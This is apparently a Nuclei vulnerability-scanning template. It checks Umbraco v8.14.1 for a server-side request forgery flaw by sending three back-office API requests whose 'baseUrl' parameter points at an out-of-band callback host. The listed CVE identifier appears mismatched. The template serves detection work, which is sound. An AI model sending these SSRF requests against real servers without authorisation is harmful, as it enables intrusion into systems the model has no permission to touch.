id: umbraco-base-ssrf

info:
  name: Umbraco v8.14.1 - 'baseUrl' SSRF
  author: dhiyaneshDk
  severity: medium
  reference: https://www.exploit-db.com/exploits/50462
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.30
    cve-id: CVE-2020-10770
    cwe-id: CWE-601
  tags: ssrf,umbraco,oast

requests:
  - method: GET
    path:
      - '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}'
      - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/'
      - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
